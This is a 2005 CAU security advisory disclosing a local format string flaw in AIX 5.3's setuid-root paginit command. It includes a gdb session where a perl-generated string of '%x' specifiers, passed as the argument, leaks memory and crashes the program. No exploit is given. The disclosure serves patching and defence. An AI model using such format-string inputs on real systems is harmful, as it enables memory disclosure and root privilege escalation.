____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Security Advisory ===============/======================================================== Advisory ID: CAU-2005-0003 Release Date: 06/06/2005 Title: IBM AIX paginit Command-line Argument Format String Application/OS: AIX 5.3 paginit Topic: Format string vulnerability in paginit's command-line argument Vendor Status: Not Notified Attributes: Local Format String Advisory URL: http://www.caughq.org/advisories/CAU-2005-0003.txt Author/Email: intropy ===============/======================================================== Overview ======== A format string vulnerability exists in paginit when handling command- line arguments. Impact ====== The program runs as suid root. Exploitation is probable leading to super-user rights or disclosure of memory. Affected Systems ================ AIX 5.3 (although others are likely vulnerable) Technical Explanation ===================== When paginit attempts to print the supplied error information memory locations can be disclosed or code executed. GNU gdb 6.0 Starting program: /usr/bin/paginit `perl -e 'print "%x" x 1024;'` %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 3004-616 User "20002c8047000f01f6aa8200407802ff22ead2ff22ead0200417c80000000000 eadbeef2ff22571deadbeef020001f182000076c200004402ff225602ff224b04428244410000a4 0020000688002ff224b00000200006880020002a18deadbeefdeadbeefdeadbeefdeadbeefdeadb efdeadbeefdeadbeef001000018c00012ff224fc2ff22504deadbeef2ff22ff804030000f01f443 00002ff225602ff2257102ff22d722ff22d832ff22d972ff22da22ff22dc12ff22dd42ff22ded2f f22df72ff22e0c2ff22e692ff22e832ff22e932ff22e9e2ff22ea82ff22eb32 Program received signal SIGSEGV, Segmentation fault. 0xd0226bc4 in _doprnt () from /usr/lib/libc.a(shr.o) Solution & Recommendations ========================== Ask IBM for a patch. Exploitation ============ Not available. References ========== Credits & Gr33ts ================ CAU